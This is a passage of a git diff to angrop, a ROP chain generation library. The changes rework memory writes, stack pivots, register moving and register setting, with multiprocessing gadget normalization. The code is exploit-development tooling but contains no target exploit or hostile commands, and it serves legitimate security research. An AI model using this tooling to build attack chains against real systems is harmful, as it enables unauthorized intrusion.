len(gadget.mem_reads) + len(gadget.mem_changes) > 0: - raise RopException("too many memory accesses for my lazy implementation") - - if use_partial_controllers and len(data) < self.project.arch.bytes: - data = data.ljust(self.project.arch.bytes, b"\x00") + mem_write = gadget.mem_writes[0] + all_deps = mem_write.addr_dependencies | mem_write.data_dependencies # constrain the successor to be at the gadget # emulate 'pop pc' - test_state = self.make_sim_state(gadget.addr) + test_state = self.make_sim_state(gadget.addr, gadget.stack_change//self.project.arch.bytes) # step the gadget pre_gadget_state = test_state state = rop_utils.step_to_unconstrained_successor(self.project, pre_gadget_state) # constrain the write - mem_write = gadget.mem_writes[0] the_action = None for a in state.history.actions.hardcopy: if a.type != "mem" or a.action != "write": @@ -218,8 +336,7 @@ def _write_to_mem_with_gadget(self, gadget, addr_val, data, use_partial_controll set(rop_utils.get_ast_dependency(a.data.ast)) == set(mem_write.data_dependencies): the_action = a break - - if the_action is None: + else: raise RopException("Couldn't find the matching action") # constrain the addr @@ -232,10 +349,11 @@ def _write_to_mem_with_gadget(self, gadget, addr_val, data, use_partial_controll test_state.add_constraints(state.memory.load(addr_val.data, len(data)) == claripy.BVV(data)) # get the actual register values - all_deps = list(mem_write.addr_dependencies) + list(mem_write.data_dependencies) reg_vals = {} + new_addr_val = None + constrained_addrs = None name = addr_bvs._encoded_name.decode() - for reg in set(all_deps): + for reg in all_deps: var = test_state.solver.eval(test_state.registers.load(reg)) # check whether this reg will propagate to addr # if yes, propagate its rebase value @@ -252,29 +370,22 @@ def _write_to_mem_with_gadget(self, gadget, addr_val, data, use_partial_controll if addr_val._rebase: var.rebase_ptr() var._rebase = True + new_addr_val = var break reg_vals[reg] = var - - chain = self._set_regs(**reg_vals) - chain.add_gadget(gadget) - - bytes_per_pop = self.project.arch.bytes - pc_offset = None - if gadget.transit_type == 'pop_pc': - pc_offset = gadget.pc_offset - else: - raise ValueError(f"Unknown gadget transit_type: {gadget.transit_type}") - - for idx in range(gadget.stack_change // bytes_per_pop): - if idx == pc_offset//bytes_per_pop: - next_pc_val = rop_utils.cast_rop_value( - chain._blank_state.solver.BVS("next_pc", self.project.arch.bits), - self.project, - ) - chain.add_value(next_pc_val) - continue - chain.add_value(self._get_fill_val()) + # if this address is set by stack + if new_addr_val is None: + constrained_addrs = [addr_val.data] + + chain = self.set_regs(**reg_vals, preserve_regs=preserve_regs) + chain = RopBlock.from_chain(chain) + chain = self._build_reg_setting_chain([chain, gadget], {}, constrained_addrs=constrained_addrs) + for idx, val in enumerate(chain._values): + if not val.symbolic and new_addr_val is not None and not new_addr_val.symbolic and \ + val.concreted == new_addr_val.concreted: + chain._values[idx] = new_addr_val + break # verify the write actually works state = chain.exec() @@ -288,3 +399,56 @@ def _write_to_mem_with_gadget(self, gadget, addr_val, data, use_partial_controll if not set(state.regs.pc.variables).pop().startswith("next_pc_"): raise RopException("the next pc is not in our control!") return chain + + ##### Main Entrance ##### + def write_to_mem(self, addr, data, preserve_regs=None, fill_byte=b"\xff"): + """ + main function + 1. do parameter sanitization + 2. cutting the data to smaller pieces to handle bad bytes in the data + """ + if preserve_regs is None: + preserve_regs = set() + + # sanity check + if not (isinstance(fill_byte, bytes) and len(fill_byte) == 1): + raise RopException("fill_byte is not a one byte string, aborting") + if not isinstance(data, bytes): + raise RopException("data is not a byte string, aborting") + if ord(fill_byte) in self.badbytes: + raise RopException("fill_byte is a bad byte!") + if isinstance(addr, RopValue) and addr.symbolic: + raise RopException("cannot write to a symbolic address") + + # split the string into smaller elements so that we can + # handle bad bytes + if all(x not in self.badbytes for x in data): + elems = [data] + else: + elems = [] + e = b'' + for x in data: + if x not in self.badbytes: + e += bytes([x]) + else: + if e: + elems.append(e) + elems.append(bytes([x])) + e = b'' + if e: + elems.append(e) + + # do the write + offset = 0 + chain = RopChain(self.project, self, badbytes=self.badbytes) + for elem in elems: + ptr = addr + offset + if self._word_contain_badbyte(ptr): + raise RopException(f"{ptr} contains bad byte!") + if len(elem) != 1 or ord(elem) not in self.badbytes: + chain += self._write_to_mem(ptr, elem, preserve_regs=preserve_regs, fill_byte=fill_byte) + offset += len(elem) + else: + chain += self._write_to_mem(ptr, elem, preserve_regs=preserve_regs, fill_byte=fill_byte) + offset += 1 + return chain diff --git a/angrop/chain_builder/pivot.py b/angrop/chain_builder/pivot.py index 840f72d9..70761c37 100644 --- a/angrop/chain_builder/pivot.py +++ b/angrop/chain_builder/pivot.py @@ -44,7 +44,7 @@ def pivot_addr(self, addr): for gadget in self._pivot_gadgets: # constrain the successor to be at the gadget # emulate 'pop pc' - init_state = self.make_sim_state(gadget.addr) + init_state = self.make_sim_state(gadget.addr, gadget.stack_change_before_pivot//self.project.arch.bytes+1) # step the gadget final_state = rop_utils.step_to_unconstrained_successor(self.project, init_state) @@ -61,13 +61,12 @@ def pivot_addr(self, addr): # iterate through the stack values that need to be in the chain sp = init_state.regs.sp arch_bytes = self.project.arch.bytes - for i in range(gadget.stack_change // arch_bytes): + for i in range(gadget.stack_change_before_pivot // arch_bytes): sym_word = init_state.memory.load(sp + arch_bytes*i, arch_bytes, endness=self.project.arch.memory_endness) - val = final_state.solver.eval(sym_word) chain.add_value(val) - state = chain.exec() + state = chain.exec(stop_at_pivot=True) if state.solver.eval(state.regs.sp == addr.data): return chain except Exception: # pylint: disable=broad-exception-caught @@ -81,7 +80,7 @@ def pivot_reg(self, reg_val): if reg not in gadget.sp_reg_controllers: continue - init_state = self.make_sim_state(gadget.addr) + init_state = self.make_sim_state(gadget.addr, gadget.stack_change_before_pivot//self.project.arch.bytes) final_state = rop_utils.step_to_unconstrained_successor(self.project, init_state) chain = self.chain_builder.set_regs() @@ -97,9 +96,9 @@ def pivot_reg(self, reg_val): val = final_state.solver.eval(sym_word) chain.add_value(val) - state = chain.exec() + state = chain.exec(stop_at_pivot=True) variables = set(state.regs.sp.variables) - if len(variables) == 1 and variables.pop().startswith(f'reg_{reg}'): + if len(variables) == 1 and variables.pop().startswith(f'sreg_{reg}'): return chain else: chain_str = chain.dstr() @@ -109,25 +108,16 @@ def pivot_reg(self, reg_val): raise RopException(f"Fail to pivot the stack to {reg}!") - def _same_effect(self, g1, g2): - if g1.sp_controllers != g2.sp_controllers: - return False - if g1.stack_change != g2.stack_change: - return False - if g1.stack_change_after_pivot != g2.stack_change_after_pivot: - return False - return True - - def _better_than(self, g1, g2): - if g1.num_sym_mem_access > g2.num_sym_mem_access: - return False - if not g1.changed_regs.issubset(g2.changed_regs): - return False - if g1.isn_count > g2.isn_count: - return False - return True + def _effect_tuple(self, g): + v1 = tuple(sorted(g.sp_controllers)) + return (v1, g.stack_change, g.stack_change_after_pivot) + + def _comparison_tuple(self, g): + return (g.num_sym_mem_access, len(g.changed_regs), g.isn_count) def filter_gadgets(self, gadgets): - gadgets = [x for x in gadgets if not x.has_conditional_branch] + gadgets = [x for x in gadgets if not x.has_conditional_branch and \ + x.transit_type != 'jmp_reg' and \ + not x.has_symbolic_access()] gadgets = self._filter_gadgets(gadgets) return sorted(gadgets, key=functools.cmp_to_key(cmp)) diff --git a/angrop/chain_builder/reg_mover.py b/angrop/chain_builder/reg_mover.py index 38e3e9b8..93ff7304 100644 --- a/angrop/chain_builder/reg_mover.py +++ b/angrop/chain_builder/reg_mover.py @@ -1,5 +1,6 @@ import logging import itertools +import multiprocessing as mp from collections import defaultdict import networkx as nx @@ -7,39 +8,199 @@ from .builder import Builder from .. import rop_utils +from ..rop_gadget import RopGadget from ..rop_chain import RopChain from ..rop_block import RopBlock from ..errors import RopException -from ..rop_gadget import RopRegMove +from ..rop_effect import RopRegMove l = logging.getLogger(__name__) +_global_reg_mover = None # type: ignore +def _set_global_reg_mover(reg_mover, ptr_list): + global _global_reg_mover# pylint: disable=global-statement + _global_reg_mover = reg_mover + Builder.used_writable_ptrs = ptr_list + +def worker_func(t): + new_move, gadget = t + gadget.project = _global_reg_mover.project # type: ignore + pre_preserve = {new_move.from_reg} + post_preserve = {new_move.to_reg} + rb = _global_reg_mover.normalize_gadget(gadget, # type: ignore + pre_preserve=pre_preserve, + post_preserve=post_preserve) + solver = None + if rb is not None: + solver = rb._blank_state.solver + return new_move, gadget.addr, solver, rb + class RegMover(Builder): """ handle register moves such as `mov rax, rcx` """ def __init__(self, chain_builder): super().__init__(chain_builder) - self._reg_moving_blocks: set[RopBlock] = None # type: ignore + self._reg_moving_gadgets: list[RopGadget] = None # type: ignore + # TODO: clean up the mess of RopGadget and RopBlock + self._reg_moving_blocks: set[RopGadget|RopBlock] = None # type: ignore self._graph: nx.Graph = None # type: ignore + self._normalize_todos = {} def bootstrap(self): - reg_moving_gadgets = self.filter_gadgets(self.chain_builder.gadgets) - self._reg_moving_blocks = {g for g in reg_moving_gadgets if g.self_contained} + self._reg_moving_gadgets = sorted(self.filter_gadgets(self.chain_builder.gadgets), key=lambda g:g.stack_change) + self._reg_moving_blocks = {g for g in self._reg_moving_gadgets if g.self_contained} self._build_move_graph() + def build_normalize_todos(self): + """ + identify non-self-contained gadgets that can potentially improve + our register move graph + """ + self._normalize_todos = {} + todos = {} + for gadget in self._reg_moving_gadgets: + if gadget.self_contained: + continue + # check whether the gadget brings new_moves: + # 1. the edge doesn't exist at all + # 2. it moves more bits than all existing ones + # TODO: 3. fewer clobbered registers? + new_moves = [] + for m in gadget.reg_moves: + edge = (m.from_reg, m.to_reg) + if not self._graph.has_edge(*edge): + new_moves.append(m) + continue + edge_data = self._graph.get_edge_data(*edge) + if m.bits > edge_data['bits']: + new_moves.append(m) + continue + for new_move in new_moves: + if new_move in todos: + todos[new_move].append(gadget) + else: + todos[new_move] = [gadget] + + # only normalize best ones + to_remove = [] + for m1 in todos: + for m2 in todos: + if m1 == m2: + continue + if m1.from_reg == m2.from_reg and m1.to_reg == m2.to_reg and m1.bits < m2.bits: + to_remove.append(m1) + for m in to_remove: + del todos[m] + + # we use address as key here instead of gadget because the gadget + # returned by multiprocessing may be different from the original one + for m, gadgets in todos.items(): + for g in gadgets: + new_moves = [m for m in g.reg_moves if m in todos] + self._normalize_todos[g.addr] = (g, new_moves) + + def normalize_todos(self): + addrs = sorted(self._normalize_todos.keys()) + again = True + while again: + cnt = 0 + for addr in addrs: + # take different gadgets to maximize performance + g, new_moves = self._normalize_todos[addr] + if new_moves: + new_move = new_moves.pop() + cnt += 1 + yield new_move, g + if cnt == 0: + again = False + + def normalize_single_threaded(self): + for new_move, gadget in self.normalize_todos(): + gadget.project = self.project + pre_preserve = {new_move.from_reg} + post_preserve = {new_move.to_reg} + rb = self.normalize_gadget(gadget, pre_preserve=pre_preserve, post_preserve=post_preserve) + if rb is not None: + yield new_move, gadget.addr, rb + + def normalize_multiprocessing(self, processes): + with mp.Manager() as manager: + # HACK: ideally, used_ptrs should be a resource of each ropblock that can be reassigned + # when conflict happens. but currently, I'm being lazy and just make sure every pointer + # is different + ptr_list = manager.list(Builder.used_writable_ptrs) + initargs = (self, ptr_list) + with mp.Pool(processes=processes, initializer=_set_global_reg_mover, initargs=initargs) as pool: + for new_move, addr, solver, rb in pool.imap_unordered(worker_func, self.normalize_todos()): + if rb is None: + continue + state = rop_utils.make_symbolic_state(self.project, self.arch.reg_list, 0) + state.solver = solver + rb.set_project(self.project) + rb.set_builder(self) + rb._blank_state = state + yield new_move, addr, rb + Builder.used_writable_ptrs = list(ptr_list) + + def optimize(self, processes): + res = False + self.build_normalize_todos() + if processes == 1: + iterable = self.normalize_single_threaded() + else: + iterable = self.normalize_multiprocessing(processes) + for new_move, addr, rb in iterable: + # if we happen to have normalized another move, don't do it again + for m in rb.reg_moves: + todo_new_moves = self._normalize_todos[addr][1] + if m in todo_new_moves: + todo_new_moves.remove(m) + # now we have this new_move, remove it from the todo list + for m in rb.reg_moves: + for addr, tup in self._normalize_todos.items(): + new_moves = tup[1] + if m in new_moves: + new_moves.remove(m) + # we already normalized it, just use it as much as we can + if rb.popped_regs: + self.chain_builder._reg_setter._insert_to_reg_dict([rb]) + if not any(m == new_move for m in rb.reg_moves): + l.warning("normalizing \n%s does not yield any wanted new reg moving capability: %s", + rb.dstr(), + new_move) + continue + res = True + for move in rb.reg_moves: + edge = (move.from_reg, move.to_reg) + if self._graph.has_edge(*edge): + edge_data = self._graph.get_edge_data(*edge) + edge_blocks = edge_data['block'] + edge_blocks.append(rb) + edge_data['block'] = sorted(edge_blocks, key=lambda x: x.stack_change) + if move.bits > edge_data['bits']: + edge_data['bits'] = move.bits + else: + self._graph.add_edge(*edge, block=[rb], bits=move.bits) + return res + def _build_move_graph(self): self._graph = nx.DiGraph() graph = self._graph # each node is a register - graph.add_nodes_from(self.arch.reg_set) + graph.add_nodes_from(self.arch.reg_list) # an edge means there is a move from the src register to the dst register - objects = defaultdict(set) + objects = defaultdict(list) + max_bits_dict = defaultdict(int) for block in self._reg_moving_blocks: for move in block.reg_moves: - objects[(move.from_reg, move.to_reg)].add(block) - for key, val in objects.items(): - graph.add_edge(key[0], key[1], block=val) + edge = (move.from_reg, move.to_reg) + objects[edge].append(block) + if move.bits > max_bits_dict[edge]: + max_bits_dict[edge] = move.bits + for edge, val in objects.items(): + val = sorted(val, key=lambda g:g.stack_change) + graph.add_edge(edge[0], edge[1], block=val, bits=max_bits_dict[edge]) def verify(self, chain, preserve_regs, registers): """ @@ -57,7 +218,7 @@ def verify(self, chain, preserve_regs, registers): if act.type not in ("mem", "reg"): continue if act.type == 'mem': - if act.addr.ast.variables: + if act.addr.ast.variables and any(not x.startswith('sym_addr') for x in act.addr.ast.variables): l.exception("memory access outside stackframe\n%s\n", chain_str) return False if act.type == 'reg' and act.action == 'write': @@ -117,7 +278,7 @@ def run(self, preserve_regs=None, **registers): # sanity check preserve_regs = set(preserve_regs) if preserve_regs else set() - unknown_regs = set(registers.keys()).union(preserve_regs) - self.arch.reg_set + unknown_regs = set(registers.keys()).union(preserve_regs) - set(self.arch.reg_list) if unknown_regs: raise RopException("unknown registers: %s" % unknown_regs) @@ -162,21 +323,27 @@ def _find_relevant_blocks(self, target_moves): for move in target_moves: # only consider the shortest path # TODO: we should use longer paths if the shortest one does work - paths = nx.all_shortest_paths(graph, source=move.from_reg, target=move.to_reg) - block_gadgets = [] - for path in paths: - edges = zip(path, path[1:]) - edge_block_list = [] - for edge in edges: - edge_blocks = graph.get_edge_data(edge[0], edge[1])['block'] - edge_block_list.append(edge_blocks) - block_gadgets += list(itertools.product(*edge_block_list)) - - # now turn them into blocks - for gs in block_gadgets: - assert gs - rb = RopBlock.from_gadget_list(gs, self) - rop_blocks.add(rb) + try: + paths = nx.all_shortest_paths(graph, source=move.from_reg, target=move.to_reg) + block_gadgets = [] + for path in paths: + edges = zip(path, path[1:]) + edge_block_list = [] + for edge in edges: + edge_blocks = graph.get_edge_data(edge[0], edge[1])['block'] + edge_block_list.append(edge_blocks) + block_gadgets += list(itertools.product(*edge_block_list)) + + # now turn them into blocks + for gs in block_gadgets: + assert gs + # FIXME: we are using the _build_reg_setting_chain API to turn mixin lists to a RopBlock + # which is pretty wrong + chain = self._build_reg_setting_chain(gs, {}) + rb = RopBlock.from_chain(chain) + rop_blocks.add(rb) + except nx.exception.NetworkXNoPath as e: # type: ignore + raise RopException(f"There is no chain can move {move.from_reg} to {move.to_reg}") from e return rop_blocks def filter_gadgets(self, gadgets): @@ -184,24 +351,18 @@ def filter_gadgets(self, gadgets): filter gadgets having the same effect """ # first: filter out gadgets that don't do register move - gadgets = {g for g in gadgets if g.reg_moves and not g.has_conditional_branch} + gadgets = {g for g in gadgets if g.reg_moves and not g.has_conditional_branch and not g.has_symbolic_access()} gadgets = self._filter_gadgets(gadgets) new_gadgets = set(x for x in gadgets if any(y.from_reg != y.to_reg for y in x.reg_moves)) return new_gadgets - def _same_effect(self, g1, g2): - """ - having the same register moving effect compared to the other gadget - """ - if set(g1.reg_moves) != set(g2.reg_moves): - return False - if g1.reg_dependencies != g2.reg_dependencies: - return False - return True + def _effect_tuple(self, g): + v1 = tuple(sorted(g.reg_moves)) + v2 = [] + for x,y in g.reg_dependencies.items(): + v2.append((x, tuple(sorted(y)))) + v2 = tuple(sorted(v2)) + return (v1, v2) - def _better_than(self, g1, g2): - if g1.stack_change <= g2.stack_change and \ - g1.num_sym_mem_access <= g2.num_sym_mem_access and \ - g1.isn_count <= g2.isn_count: - return True - return False + def _comparison_tuple(self, g): + return (g.stack_change, g.num_sym_mem_access, rop_utils.transit_num(g), g.isn_count) diff --git a/angrop/chain_builder/reg_setter.py b/angrop/chain_builder/reg_setter.py index 50ac5f28..1cb1b507 100644 --- a/angrop/chain_builder/reg_setter.py +++ b/angrop/chain_builder/reg_setter.py @@ -1,9 +1,9 @@ -import heapq +import itertools import logging from collections import defaultdict, Counter -from typing import Iterable, Iterator +from functools import cmp_to_key -import claripy +import networkx as nx from angr.errors import SimUnsatError from .builder import Builder @@ -13,7 +13,7 @@ from ..rop_gadget import RopGadget from ..errors import RopException -l = logging.getLogger("angrop.chain_builder.reg_setter") +l = logging.getLogger(__name__) class RegSetter(Builder): """ @@ -22,23 +22,17 @@ class RegSetter(Builder): 2. algo2: pop-only bfs search, fast, reliable, can generate chains to bypass bad-bytes 3. algo3: riscy-rop inspired backward search, slow, can utilize gadgets containing conditional branches """ + + #### Inits #### def __init__(self, chain_builder): super().__init__(chain_builder) # all the gadgets that can set registers self._reg_setting_gadgets: set[RopGadget]= None # type: ignore self.hard_chain_cache: dict[tuple, list] = None # type: ignore # Estimate of how difficult it is to set each register. - self._reg_weights: dict[str, int] = None # type: ignore + # all self-contained and not symbolic access self._reg_setting_dict: dict[str, list] = None # type: ignore - def _insert_to_reg_dict(self, gs): - for rb in gs: - for reg in rb.popped_regs: - self._reg_setting_dict[reg].append(rb) - for reg in self._reg_setting_dict: - lst = self._reg_setting_dict[reg] - self._reg_setting_dict[reg] = sorted(lst, key=lambda x: x.stack_change) - def bootstrap(self): self._reg_setting_gadgets = self.filter_gadgets(self.chain_builder.gadgets) @@ -47,6 +41,8 @@ def bootstrap(self): for g in self._reg_setting_gadgets: if not g.self_contained: continue + if g.has_symbolic_access(): + continue for reg in g.popped_regs: self._reg_setting_dict[reg].append(g) self._insert_to_reg_dict([]) # sort reg dict @@ -54,64 +50,44 @@ def bootstrap(self): reg_pops = Counter() for gadget in self._reg_setting_gadgets: reg_pops.update(gadget.popped_regs) - self._reg_weights = { - reg: 5 if reg_pops[reg] == 0 else 2 if reg_pops[reg] == 1 else 1 - for reg in self.arch.reg_set - } self.hard_chain_cache = {} - def optimize(self): - # now we have a functional RegSetter, check whether we can do better - - # first, TODO: see whether we can use reg_mover to set hard-registers - - # second, see whether we can use non-self-contained gadgets to reduce stack-change requirements - # TODO: currently, we only support jmp_reg gadgets - bests = {} - for gadget in self._reg_setting_gadgets: - if gadget.self_contained: - continue - if gadget.has_conditional_branch: - continue - if gadget.transit_type != 'jmp_reg': - continue - stack_change = gadget.stack_change - if gadget.pc_reg not in self._reg_setting_dict: - continue - - # choose the best gadget to set the PC for this jmp_reg gadget - pc_setter = None - for g in self._reg_setting_dict[gadget.pc_reg]: - if g.has_symbolic_access(): - continue - pc_setter = g - break - if pc_setter is None: - continue - pc_setter_sc = pc_setter.stack_change - - for reg in gadget.popped_regs: - if gadget.pc_reg not in self._reg_setting_dict: - continue - total_sc = stack_change + pc_setter_sc - reg_sc = self._reg_setting_dict[reg][0].stack_change if reg in self._reg_setting_dict else 0xffffffff - if total_sc > reg_sc: - continue + #### Utility Functions #### + def _insert_to_reg_dict(self, gs): + for rb in gs: + for reg in rb.popped_regs: + self._reg_setting_dict[reg].append(rb) + for reg in self._reg_setting_dict: + lst = self._reg_setting_dict[reg] + self._reg_setting_dict[reg] = sorted(lst, key=lambda x: x.stack_change) - assert isinstance(pc_setter, RopGadget) - try: - chain = self._build_reg_setting_chain([pc_setter, gadget], None, {}, total_sc) - rb = RopBlock.from_chain(chain) - assert rb.stack_change == total_sc - if reg not in bests or rb.stack_change < bests[reg].stack_change: - bests[reg] = rb - elif rb.stack_change == bests[reg].stack_change and \ - bests[reg].num_sym_mem_access > rb.num_sym_mem_access: - bests[reg] = rb - except RopException: - pass - self._insert_to_reg_dict(bests.values()) + def _expand_ropblocks(self, mixins): + """ + expand simple ropblocks to gadgets so that we don't encounter solver conflicts + when using the same ropblock multiple times + """ + gadgets = [] + for mixin in mixins: + if isinstance(mixin, RopGadget): + gadgets.append(mixin) + elif isinstance(mixin, RopBlock): + if mixin._blank_state.solver.constraints: + try: + rb = self._build_reg_setting_chain(mixin._gadgets, {}) + rb = RopBlock.from_chain(rb) + if mixin.popped_regs.issubset(rb.popped_regs): + rb.pop_equal_set = mixin.pop_equal_set.copy() + gadgets += mixin._gadgets + continue + except RopException: + pass + gadgets.append(mixin) + else: + gadgets += mixin._gadgets + else: + raise ValueError(f"cannot turn {mixin} into RopBlock!") + return gadgets def verify(self, chain, preserve_regs, registers): """ @@ -124,7 +100,7 @@ def verify(self, chain, preserve_regs, registers): if act.type not in ("mem", "reg"): continue if act.type == 'mem': - if act.addr.ast.variables: + if act.addr.ast.variables and any(not x.startswith('sym_addr') for x in act.addr.ast.variables): l.exception("memory access outside stackframe\n%s\n", chain_str) return False if act.type == 'reg' and act.action == 'write': @@ -133,14 +109,20 @@ def verify(self, chain, preserve_regs, registers): offset -= act.offset % self.project.arch.bytes reg_name = self.project.arch.translate_register_name(offset) if reg_name in preserve_regs: - l.exception("Somehow angrop thinks\n%s\ncan be used for the chain generation-1.\nregisters: %s", - chain_str, registers) + fmt = "Somehow angrop thinks\n%s\n" + fmt += "can be used for the chain generation-1.\n" + fmt += "registers: %s\n" + fmt += "preserve_regs: %s\n" + l.exception(fmt, chain_str, registers, preserve_regs) return False for reg, val in registers.items(): bv = getattr(state.regs, reg) if (val.symbolic != bv.symbolic) or state.solver.eval(bv != val.data): - l.exception("Somehow angrop thinks\n%s\ncan be used for the chain generation-2.\nregisters: %s", - chain_str, registers) + fmt = "Somehow angrop thinks\n%s\n" + fmt += "can be used for the chain generation-1.\n" + fmt += "registers: %s\n" + fmt += "preserve_regs: %s\n" + l.exception(fmt, chain_str, registers, preserve_regs) return False # the next pc must be marked as the next_pc if len(state.regs.pc.variables) != 1: @@ -148,322 +130,417 @@ def verify(self, chain, preserve_regs, registers): pc_var = set(state.regs.pc.variables).pop() return pc_var.startswith("next_pc") - @staticmethod - def _mixins_to_gadgets(mixins): - gadgets = [] - for mixin in mixins: - if isinstance(mixin, RopGadget): - gadgets.append(mixin) - elif isinstance(mixin, RopBlock): - gadgets += mixin._gadgets - else: - raise ValueError(f"cannot turn {mixin} into RopBlock!") - return gadgets + def can_set_reg(self, reg): + return bool(self._reg_setting_dict[reg]) - def run(self, modifiable_memory_range=None, preserve_regs=None, max_length=10, **registers): - if len(registers) == 0: - return RopChain(self.project, self, badbytes=self.badbytes) - - # sanity check - preserve_regs = set(preserve_regs) if preserve_regs else set() - unknown_regs = set(registers.keys()).union(preserve_regs) - self.arch.reg_set - if unknown_regs: - raise RopException("unknown registers: %s" % unknown_regs) + #### Graph Optimization #### + def _normalize_for_move(self, gadget, new_move): + """ + two methods: + 1. normalize it and hope the from_reg to be set during normalization + 2. normalize it and make sure the from_reg won't be clobbered during normalization and then prepend it + """ + rb = self.normalize_gadget(gadget, post_preserve={new_move.to_reg}, to_set_regs={new_move.from_reg}) + if rb is None: # if this does not exist, no need to try the more strict version + return None + if new_move.to_reg in rb.popped_regs: + return rb - # cast values to RopValue - for x in registers: - registers[x] = rop_utils.cast_rop_value(registers[x], self.project) + rb = self.normalize_gadget(gadget, pre_preserve={new_move.from_reg}, post_preserve={new_move.to_reg}) + if rb is None: + return None + reg_setter = self._reg_setting_dict[new_move.from_reg][0] + if isinstance(reg_setter, RopGadget): + reg_setter = RopBlock.from_gadget(reg_setter, self) + try: + rb = reg_setter + rb + except RopException: + l.error("reg_setter + rb fail to execute, plz raise an issue") + return None - for gadgets in self.iterate_candidate_chains(modifiable_memory_range, preserve_regs, max_length, registers): - chain_str = "\n".join(g.dstr() for g in gadgets) - l.debug("building reg_setting chain with chain:\n%s", chain_str) - stack_change = sum(x.stack_change for x in gadgets) - try: - gadgets = self._mixins_to_gadgets(gadgets) - chain = self._build_reg_setting_chain(gadgets, modifiable_memory_range, - registers, stack_change) - chain._concretize_chain_values(timeout=len(chain._values)*3) - if self.verify(chain, preserve_regs, registers): - #self._chain_cache[reg_tuple].append(gadgets) - return chain - except (RopException, SimUnsatError): - pass + return rb - raise RopException("Couldn't set registers :(") + def _should_normalize_reg_move(self, src, dst, shortest): + # we can't set the source register, no point in normalizing it + if src not in shortest: + return False + # situations we want to check + # 1. this is a hard register and we can set the source + # 2. the final chain is expected to be shorter than the best setter + # for the second scenario, we only check whether the move can be done in one step + mover_graph = self.chain_builder._reg_mover._graph + if not self._reg_setting_dict[dst] and self._reg_setting_dict[src]: + return True + edge = (src, dst) + if mover_graph.has_edge(edge[0], edge[1]): + edge_blocks = mover_graph.get_edge_data(edge[0], edge[1])['block'] + if edge_blocks[0].stack_change + shortest[src] < shortest[dst]: + return True + return False - def iterate_candidate_chains(self, modifiable_memory_range, preserve_regs, max_length, registers): - # algorithm1 - gadgets, _, _ = self.find_candidate_chains_graph_search(modifiable_memory_range=modifiable_memory_range, - preserve_regs=preserve_regs.copy(), - **registers) - if gadgets: - yield gadgets - - # algorithm2 - yield from self.find_candidate_chains_pop_only_bfs_search( - self._find_relevant_gadgets(allow_mem_access=False, **registers), - preserve_regs.copy(), - **registers) - - # algorithm3 - yield from self.find_candidate_chains_backwards_recursive_search( - self._reg_setting_gadgets, - set(registers), - current_chain=[], - preserve_regs=preserve_regs.copy(), - modifiable_memory_range=modifiable_memory_range, - visited={}, - max_length=max_length) - - #### Chain Building Algorithm 1: fast but unreliable graph-based search #### + def _can_set_reg_with_bits(self, reg, bits): + blocks = self._reg_setting_dict[reg] + for block in blocks: + pop = block.get_pop(reg) + if pop.bits >= bits: + return True + return False @staticmethod - def _tuple_to_gadgets(data, reg_tuple): - """ - turn the entry tuple in the graph search to a list of gadgets - """ - if reg_tuple in data: - gadgets_reverse = [] - curr_tuple = reg_tuple - else: - gadgets_reverse = reg_tuple[2] - curr_tuple = () - while curr_tuple != (): - gadgets_reverse.append(data[curr_tuple][2]) - curr_tuple = data[curr_tuple][0] - return gadgets_reverse[::-1] + def block_with_max_bit_moves(edge, edge_data): + blocks = edge_data['block'] + edge_bits = edge_data['bits'] + results = [] + for block in blocks: + for m in block.reg_moves: + if m.from_reg == edge[0] and m.to_reg == edge[1]: + break + else: + raise RuntimeError("????") + if m.bits == edge_bits: + results.append(block) + return results + + def _optimize_with_reg_moves(self): + # basically, we are looking for situations like this: + # 1) we can set register A to arbitrary value (in self._reg_setting_dict) AND + # 2) we can move register A to another register, preferably an unseen one + mover_graph = self.chain_builder._reg_mover._graph + rop_blocks = [] + shortest = {x:y[0].stack_change for x,y in self._reg_setting_dict.items() if y} + for src, dst in itertools.product(self._reg_setting_dict.keys(), self.arch.reg_list): + if src == dst: + continue - @staticmethod - def _verify_chain(chain, regs): - """ - make sure the new chain does not do bad memory accesses - """ - accesses = set() - for g in chain: - accesses.update(set(g.mem_reads + g.mem_writes + g.mem_changes)) - accesses = set(m for m in accesses if m.is_symbolic_access()) - for mem_access in accesses: - if mem_access.addr_controllers and not mem_access.addr_controllers.intersection(regs): - return False + if not self._should_normalize_reg_move(src, dst, shortest): + continue - return True + paths = nx.all_simple_paths(mover_graph, src, dst, cutoff=3) + all_chains = defaultdict(list) + for path in paths: + path_chain = [] + edges = zip(path, path[1:]) + path_bits = self.project.arch.bits + for edge in edges: + edge_data = mover_graph.get_edge_data(edge[0], edge[1]) + edge_bits = edge_data['bits'] + path_bits = min(path_bits, edge_bits) + # for each edge, take the shortest 5 blocks + edge_blocks = sorted(RegSetter.block_with_max_bit_moves(edge, edge_data), + key=lambda g: g.stack_change)[:5] + path_chain.append(edge_blocks) + setter_chain = [] + for setter in self._reg_setting_dict[src]: + pop = setter.get_pop(src) + if pop.bits >= path_bits: + setter_chain.append(setter) + if not setter_chain: + continue + path_chains = list(itertools.product(*([setter_chain]+path_chain))) + all_chains[path_bits] += path_chains - # todo allow user to specify rop chain location so that we can use read_mem gadgets to load values - # todo allow specify initial regs - # todo memcopy(from_addr, to_addr, len) - # todo handle "leave" then try to do a mem write on chess from codegate-finals - def find_candidate_chains_graph_search(self, modifiable_memory_range=None, use_partial_controllers=False, - max_stack_change=None, preserve_regs=None, **registers): - """ - Finds a list of gadgets which set the desired registers - This method currently only handles simple cases and will be improved later - :param registers: - :return: - """ - preserve_regs = set(preserve_regs) if preserve_regs else set() - search_regs = set(registers) - - if modifiable_memory_range is not None and len(modifiable_memory_range) != 2: - raise RopException("modifiable_memory_range should be a tuple (low, high)") - - # find gadgets with sufficient partial control - partial_controllers = {} - for r in registers: - partial_controllers[r] = set() - if use_partial_controllers: - partial_controllers = self._get_sufficient_partial_controllers(registers) - - # filter reg setting gadgets - allow_mem_access = modifiable_memory_range is not None - gadgets = self._find_relevant_gadgets(allow_mem_access=allow_mem_access, **registers) - for s in partial_controllers.values(): - gadgets.update(s) - gadgets = list(gadgets) - l.debug("finding best gadgets") - - # lets try doing a graph search to set registers, something like dijkstra's for minimum length - - # each key is tuple of sorted registers - # use tuple (prev, total_stack_change, gadget, partial_controls) - data = {} - - to_process = [] - to_process.append((0, ())) - visited = set() - data[()] = (None, 0, None, set()) - best_stack_change = 0xffffffff - best_reg_tuple = None - while to_process: - regs = heapq.heappop(to_process)[1] - - if regs in visited: + if not all_chains: continue - visited.add(regs) - if data[regs][1] >= best_stack_change: + def chain_sc(gadgets): + sc = 0 + for g in gadgets: + sc += g.stack_change + return sc + unique_chains = [] + max_bits = max(all_chains.keys()) + if not 